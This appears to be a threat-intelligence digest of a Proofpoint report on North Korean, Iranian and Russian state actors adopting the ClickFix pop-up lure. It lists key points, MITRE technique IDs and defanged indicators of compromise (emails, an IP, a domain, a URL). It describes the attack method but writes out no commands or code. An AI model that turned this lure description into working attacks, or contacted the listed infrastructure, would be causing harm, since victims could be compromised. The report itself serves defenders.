In recent months, state-sponsored actors from North Korea, Iran, and Russia have begun utilizing the ClickFix social engineering technique, which has primarily been associated with cybercriminals. This shift indicates a potential evolution in espionage tactics, as traditional campaigns are being augmented with innovative methods. The use of ClickFix represents a growing trend where cybercriminal techniques are adopted by state actors for espionage activities. Affected: North Korea, Iran, Russia, Cybercrime, Espionage.
Keypoints :
- ClickFix is a social engineering technique first observed in early March 2024.
- State-sponsored actors from North Korea, Iran, and Russia began incorporating ClickFix in their tactics between late 2024 and early 2025.
- ClickFix acts as a replacement for the installation and execution stages of existing infection chains.
- The technique uses authoritative pop-up alerts to trick victims into running malicious commands.
- TA427, TA450, UNK_RemoteRogue, and TA422 are notable groups utilizing ClickFix.
- QuasarRAT, a known malware, has been utilized by state actors, particularly TA427.
- Dynamic DNS services were exploited to support ClickFix campaigns.
MITRE Techniques :
- T1193: Spear Phishing Link – TA427 used a phishing email with a malicious link to engage targets.
- T1059.001: Command and Scripting Interpreter: PowerShell – Malicious PowerShell commands were run via ClickFix.
- T1064: Scripting – VBS scripts were scheduled to run malicious tasks every 19 minutes.
- T1203: Exploitation for Client Execution – Unauthenticated users were exploited to execute commands.
Indicator of Compromise :
- [Email Address] yasuyuki.ebata21@proton[.]me
- [Email Address] eunsoolim29@gmail[.]com
- [IP Address] 38.180.157[.]197
- [Domain] securedrive.fin-tech[.]com
- [URL] hxxps://securedrive.fin-tech[.]com/docs/en/register
Full Story: https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix